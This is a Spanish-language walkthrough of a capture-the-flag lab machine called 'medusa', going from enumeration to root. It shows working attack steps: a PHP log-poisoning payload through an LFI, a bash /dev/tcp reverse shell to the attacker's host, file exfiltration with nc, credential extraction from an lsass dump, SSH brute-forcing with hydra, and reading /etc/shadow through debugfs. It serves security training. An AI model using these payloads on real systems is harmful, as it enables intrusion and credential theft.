Indentificamos la IP de la máquina víctima:
❯ arp-scan --interface=wlo1 --localnet | grep PCS | awk '{print $1}'
192.168.192.18 

Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.18
[sudo] contraseña para wh01s17: 
Starting Nmap 7.97 ( https://nmap.org ) at 2025-08-06 15:02 -0400
Nmap scan report for 192.168.1.18
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:18:F9:3E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.97 seconds

❯ nmap -sCV -p 21,22,80 -oN 02-targeted.txt 192.168.1.18
Starting Nmap 7.97 ( https://nmap.org ) at 2025-08-06 15:03 -0400
Nmap scan report for 192.168.1.18
Host is up (0.00037s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 70:d4:ef:c9:27:6f:8d:95:7a:a5:51:19:51:fe:14:dc (RSA)
|   256 3f:8d:24:3f:d2:5e:ca:e6:c9:af:37:23:47:bf:1d:28 (ECDSA)
|_  256 0c:33:7e:4e:95:3d:b0:2d:6a:5e:ca:39:91:0d:13:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.54 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.65 seconds

Ingresamos al sitio web, y nos encontramos con una página de apache, que simula ser la página por default, pero en el último párrafo, encontramos un mensaje:
...
check Kraken open the door.
...

Enumeramos directorios:
❯ gobuster dir -u 'http://192.168.1.18' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,sql,xml,zip,sh,db -r 
...
/index.html           (Status: 200) [Size: 10674]
/manual               (Status: 200) [Size: 676]
/server-status        (Status: 403) [Size: 277]
/hades                (Status: 200) [Size: 0]
...

❯ gobuster dir -u 'http://192.168.1.18/hades' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,sql,xml,zip,sh,db -r 
...
/index.php            (Status: 200) [Size: 0]
/door.php             (Status: 200) [Size: 555]
...

Ingresamos a http://192.168.1.18/hades/door.php, y nos solicita una palabra mágica, por lo que ingresamos Kraken:
Please enter the magic word...: Kraken

Nos muestra un dominio llamado medusa.hmv, el cual agregamos a nuestro /etc/hosts y enumermos subdominios con ffuf:
❯ cat /etc/hosts | grep medusa.hmv
192.168.1.18	medusa.hmv

❯ ffuf -u 'http://medusa.hmv' -H 'Host: FUZZ.medusa.hmv' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -fs 10674
...
dev                     [Status: 200, Size: 1973, Words: 374, Lines: 26, Duration: 7ms]
...

Lo agregamos a nuestro /etc/hosts y enumeramos nuevamente los directorios:
❯ cat /etc/hosts | grep medusa.hmv
192.168.1.18	medusa.hmv dev.medusa.hmv

❯ gobuster dir -u 'http://dev.medusa.hmv' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,sql,xml,zip,sh,db -r 
...
/index.html           (Status: 200) [Size: 1973]
/files                (Status: 200) [Size: 0]
/assets               (Status: 200) [Size: 943]
/css                  (Status: 200) [Size: 935]
/manual               (Status: 200) [Size: 676]
/robots.txt           (Status: 200) [Size: 489]
...

❯ gobuster dir -u 'http://dev.medusa.hmv/files' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,sql,xml,zip,sh,db -r 
...
/index.php            (Status: 200) [Size: 0]
/system.php           (Status: 200) [Size: 0]
/readme.txt           (Status: 200) [Size: 144]
...

Fuzzeamos en /system.php en busca de algún parámetro:
❯ ffuf -u 'http://dev.medusa.hmv/files/system.php?FUZZ=/etc/passwd' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -fs 0 
...
view     [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 3ms]
...

Comprobamos la vulnerabilidad LFI, ingresando a http://dev.medusa.hmv/files/system.php?view=/etc/passwd:
❯ curl 'http://dev.medusa.hmv/files/system.php?view=/etc/passwd'
...
root:x:0:0:root:/root:/bin/bash
spectre:x:1000:1000:spectre,,,:/home/spectre:/bin/bash
...

Para obtener una shell, realizaremos un log poisoning en el servicio vsftpd.

Para eso, probamos si tenemos acceso a los logs del servicio, ingresando a http://dev.medusa.hmv/files/system.php?view=/var/log/vsftpd.log:
❯ curl 'http://dev.medusa.hmv/files/system.php?view=/var/log/vsftpd.log'
Wed Aug  6 15:03:07 2025 [pid 530] CONNECT: Client "::ffff:192.168.1.4"
Wed Aug  6 15:03:13 2025 [pid 534] CONNECT: Client "::ffff:192.168.1.4"
Wed Aug  6 15:03:13 2025 [pid 539] CONNECT: Client "::ffff:192.168.1.4"
Wed Aug  6 15:03:13 2025 [pid 540] CONNECT: Client "::ffff:192.168.1.4"
Wed Aug  6 15:03:13 2025 [pid 541] CONNECT: Client "::ffff:192.168.1.4"
Wed Aug  6 15:03:16 2025 [pid 537] [anonymous] FAIL LOGIN: Client "::ffff:192.168.1.4"
Wed Aug  6 15:03:16 2025 [pid 532] [anonymous] FAIL LOGIN: Client "::ffff:192.168.1.4"
Wed Aug  6 15:03:16 2025 [pid 538] [anonymous] FAIL LOGIN: Client "::ffff:192.168.1.4"
Wed Aug  6 15:03:17 2025 [pid 556] CONNECT: Client "::ffff:192.168.1.4"
Wed Aug  6 15:03:17 2025 [pid 558] CONNECT: Client "::ffff:192.168.1.4"
Wed Aug  6 15:03:17 2025 [pid 560] CONNECT: Client "::ffff:192.168.1.4"
Wed Aug  6 15:03:17 2025 [pid 562] CONNECT: Client "::ffff:192.168.1.4"
Wed Aug  6 15:03:17 2025 [pid 564] CONNECT: Client "::ffff:192.168.1.4"
Wed Aug  6 15:03:17 2025 [pid 568] CONNECT: Client "::ffff:192.168.1.4"

Intentamos iniciar sesión, ingresando un payload en php para obtener RCE como usuario:
❯ ftp 192.168.1.18
Connected to 192.168.1.18.
220 (vsFTPd 3.0.3)
Name (192.168.1.18:wh01s17): '<?php system($_GET['cmd']); ?>'
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed.

Probamos el RCE ingresando a http://dev.medusa.hmv/files/system.php?view=/var/log/vsftpd.log&cmd=id:
❯ curl 'http://dev.medusa.hmv/files/system.php?view=/var/log/vsftpd.log&cmd=id'
...
Wed Aug  6 15:33:30 2025 [pid 946] ['uid=33(www-data) gid=33(www-data) groups=33(www-data)
...

Ejecutamos una reverse shell:
bash -c "bash -i >& /dev/tcp/192.168.1.4/1234 0>&1"

❯ curl 'http://dev.medusa.hmv/files/system.php?view=/var/log/vsftpd.log&cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.1.4/1234%200%3E%261%22'

❯ ncat -nlvp 1234
Ncat: Version 7.97 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
id
Ncat: Connection from 192.168.1.18:51236.
bash: cannot set terminal process group (429): Inappropriate ioctl for device
bash: no job control in this shell
www-data@medusa:/var/www/dev/files$

Ingresamos a la raiz y descubrimos un directorio llamado "...".

Ingresamos y descubrimos un fichero:
www-data@medusa:/...$ ls -l
total 12100
-rw------- 1 www-data www-data 12387024 Jan 18  2023 old_files.zip

Lo transferimos a nuestra máquina para el análisis:
❯ nc -lvp 4444 > old_files.zip
Listening on 0.0.0.0 4444

www-data@medusa:/...$ nc 192.168.1.4 4444 < old_files.zip

❯ nc -lvp 4444 > old_files.zip
Listening on 0.0.0.0 4444
Connection received on medusa.hmv 48494

El archivo se encuentra enctriptado, por lo que crackeamos con john:
❯ zip2john old_files.zip > zip_hash

❯ john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt zip_hash
...
medusa666        (old_files.zip/lsass.DMP)
...

Extraemos el contenido y descubrimos un dump de memoria:
❯ 7z x old_files.zip
...    
Enter password:medusa666

Everything is Ok

Encontramos un crash dump de memoria y analizamos con pypykatz:
❯ pypykatz lsa --json minidump lsass.DMP > output.txt
INFO:pypykatz:Parsing file lsass.DMP

Extraemos los passwords y usernames del archivo y probamos con hydra:
❯ awk -F'"' '/"password":/ {print $4}' output.txt | uniq > passwds.txt

❯ awk -F'"' '/"username":/ {print $4}' output.txt | uniq > users.txt

❯ hydra -L users.txt -P passwds.txt ssh://192.168.1.18:22 -t 64
...
[22][ssh] host: 192.168.1.18   login: spectre   password: 5p3ctr3_p0is0n_xX
...

Nos logueamos como el usuario spectre via SSH y obtenemos la primera flag:
❯ ssh spectre@192.168.1.18
spectre@192.168.1.18's password: 5p3ctr3_p0is0n_xX
Linux medusa 5.10.0-20-amd64 #1 SMP Debian 5.10.158-2 (2022-12-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Aug  6 16:04:34 2025 from 192.168.1.4
spectre@medusa:~$ 

Para escalar privilegios, ejecutamos el comando id, para verificar a que grupos pertenece el usuario spectre:
spectre@medusa:~$ id
uid=1000(spectre) gid=1000(spectre) groups=1000(spectre),6(disk),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

El usuario pertenece al grupo cdrom, el cuál nos permite acceder a carpetas del sistema sin restricciones.

Montamos la partición de archivos y listamos el contenido del archivo /etc/shadow:
spectre@medusa:~$ lsblk
NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
sda      8:0    0    8G  0 disk 
├─sda1   8:1    0    7G  0 part /
├─sda2   8:2    0    1K  0 part 
└─sda5   8:5    0  975M  0 part [SWAP]
sr0     11:0    1 1024M  0 rom

spectre@medusa:~$ find / -name debugfs 2>/dev/null
/usr/sbin/debugfs

spectre@medusa:~$ /usr/sbin/debugfs /dev/sda1
debugfs 1.46.2 (28-Feb-2021)
debugfs:  cat /etc/shadow
...
root:$y$j9T$AjVXCCcjJ6jTodR8BwlPf.$4NeBwxOq4X0/0nCh3nrIBmwEEHJ6/kDU45031VFCWc2:19375:0:99999:7:::
...

Creackeamos el hash del usuario root con john:
❯ echo 'root:$y$j9T$AjVXCCcjJ6jTodR8BwlPf.$4NeBwxOq4X0/0nCh3nrIBmwEEHJ6/kDU45031VFCWc2' > root_hash
❯ john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt root_hash
...
andromeda        (root)
...

spectre@medusa:~$ su root
Password: andromeda
root@medusa:/home/spectre#

Obtenemos la última flag y fin.

